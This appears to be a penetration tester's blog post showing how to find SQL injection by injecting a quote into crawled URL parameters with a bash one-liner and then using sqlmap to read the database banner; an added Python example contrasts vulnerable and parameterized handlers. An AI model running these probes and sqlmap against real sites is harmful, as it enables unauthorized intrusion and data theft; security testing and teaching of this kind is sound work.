How to find SQL Injection using a simple technique


Abd El Rahman Ezzat
2 min read · Jun 23, 2023

Introduction:

In this article, I’ll explore how to find SQL Injection in a simple way and how to dump the database later using sqlmap.

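Checking for SQL Injection Vulnerability:

1. We will use the bash one-liner below. It collects known URLs for the target, keeps the ones that carry query parameters, replaces the parameter value with A', and then lists the URLs whose responses contain SQL, syntax, or error.

$ echo "http://<target>/" | gau | uro | grep "\?" | sed "s/=.*/=A\'/" | sort -u > params.txt; cat params.txt | httpx -mr ".*SQL.*|.*syntax.*|.*error.*"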

It seems we now have some endpoints that may be vulnerable to SQL injection.

Now we move on to the next step.

2. Explore the endpoints.

Judging from the errors in the responses, these endpoints appear to be vulnerable to SQL injection.

3. Exploit the vulnerable endpoints. We are going to use sqlmap.

$ sqlmap -u "http://<target>/sqli?param=A" -p param --dbms=MSSQL --level 1 --risk 1 --banner

It seems that now we are able to get the database banner and exploit the SQL injection properly.
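Why the A' probe from step 1 produces the error responses seen in step 2, and what the corrected handler looks like, as an added example that is not code from the original article. The handler names, the products table, and the use of SQLite in place of the real backend are assumptions made for illustration.

```python
import re
import sqlite3

PROBE = "A'"  # value the one-liner's sed step puts into each parameter
# Response pattern from the article's httpx step (case-sensitive here).
ERROR_PATTERN = re.compile(r".*SQL.*|.*syntax.*|.*error.*")

def make_db():
    # Constructed sample data; SQLite stands in for the real backend.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO products (name) VALUES (?)", [("A",), ("B",)])
    return db

def vulnerable_handler(db, param):
    # Weak: input is concatenated into the statement, and the driver's
    # error text is returned to the client.
    query = "SELECT id FROM products WHERE name = '" + param + "'"
    try:
        rows = db.execute(query).fetchall()
    except sqlite3.Error as exc:
        return 500, f"SQL error: {exc}"
    return 200, f"{len(rows)} result(s)"

def hardened_handler(db, param):
    # Fixed: the value is bound as a parameter, so the quote is data.
    # Failures return a generic body with no database detail.
    try:
        rows = db.execute(
            "SELECT id FROM products WHERE name = ?", (param,)
        ).fetchall()
    except sqlite3.Error:
        return 500, "Request failed"
    return 200, f"{len(rows)} result(s)"

def flagged(body):
    # True when the article's response filter would list this endpoint.
    return ERROR_PATTERN.search(body) is not None

def compare(param=PROBE):
    db = make_db()
    return {
        "vulnerable": vulnerable_handler(db, param),
        "hardened": hardened_handler(db, param),
    }

if __name__ == "__main__":
    for name, (status, body) in compare().items():
        print(name, status, body, "flagged" if flagged(body) else "clean")
```

A generic error page that merely contains the word "error" would also match the filter, which is why the hits still need the manual review done in step 2.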


Written by Abd El Rahman Ezzat

Senior Information Security Consultant | Penetration Tester

Responses (4)


niceeee

--

I loved it

--

I have a qn broo ... did you get logged into the account of the target site ... or you were exploiting from the OUTSIDE OF THE WEBSITE ... I mean without logging in

--